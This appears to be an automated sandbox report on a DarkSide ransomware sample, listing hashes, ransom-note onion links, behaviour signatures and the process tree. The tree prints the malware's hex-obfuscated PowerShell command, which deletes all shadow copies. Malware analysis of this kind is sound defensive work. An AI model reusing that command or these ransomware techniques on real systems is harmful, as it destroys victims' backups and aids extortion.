Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
95s -
max time network
152s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
06/03/2025, 01:34
Static task
static1
Behavioral task
behavioral1
Sample
f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
Resource
win10ltsc2021-20250217-en
General
-
Target
f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
-
Size
1.1MB
-
MD5
ec0e75c477fc54c92c47788bb9ccc034
-
SHA1
c7f2264d27ac44beb66f13d383f5ad6671750af0
-
SHA256
f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef
-
SHA512
db0408032dc4aade2533feb5261d2688c14a96e572712d45d4d7d6f30895061da8b76cabbbbb4ba9b93d2dda3c26f9d878d4c7c8c5e6df54958875dfad1bc740
-
SSDEEP
24576:RppmWj2AWJ2Shnp9KTWlaFK1HDe4JU0DFNKq5o2QZNQSGkZ2:RppmVMShnp9KSEFyHDzD3KqcZEW
Malware Config
Extracted
C:\Users\README.ef6b5dca.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Darkside family
-
Renames multiple (167) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 3944 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 2624 5044 WerFault.exe 83 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 3944 powershell.exe 3944 powershell.exe 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeSecurityPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeTakeOwnershipPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeLoadDriverPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeSystemProfilePrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeSystemtimePrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeProfSingleProcessPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeIncBasePriorityPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeCreatePagefilePrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeBackupPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeRestorePrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeShutdownPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeDebugPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeSystemEnvironmentPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeRemoteShutdownPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeUndockPrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeManageVolumePrivilege 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: 33 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: 34 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: 35 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: 36 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeBackupPrivilege 6060 vssvc.exe Token: SeRestorePrivilege 6060 vssvc.exe Token: SeAuditPrivilege 6060 vssvc.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 5044 wrote to memory of 3944 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 84 PID 5044 wrote to memory of 3944 5044 f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 84 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe"C:\Users\Admin\AppData\Local\Temp\f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 9162⤵
- Program crash
PID:2624
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 224 -p 5044 -ip 50441⤵PID:3900
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD54521e67a3b03b060fde700c36d3b9297
SHA14a730cd86dc7a57ac001d59853dd500c1b83b4ab
SHA256a72aa223a84c4fa011c8a2b0ef2475a83d5123de2cdfa6a7160231729e68383d
SHA51290235850eef71c2f0921d04e6990147af9e76fec8ee49e12e6a5bab065ff0e63331a54be845026f17a7b1dd230ee94843099db4813c127c6bafb8cbaf59b753f
-
Filesize
1KB
MD568f1fd10d7d7b8885ed45d8451a89c9e
SHA1358aef85c7599e6818a7ea28eedfe1670cf365b6
SHA25699ba4a513afbe189d3e8ad82557ee210f0aa434d92c91e6319c0755a1a78d673
SHA512a35c2b933fae8ef367b87f5c7b8c21328ef78f92dee86ecd5018bbfe46469357b6a4c7927e8cdfb83a094f687e47fb4f9843252372b70e1a8fec78ab679dea19
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD525d0b19a0ec34a39dfa3e177866f01a3
SHA1a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198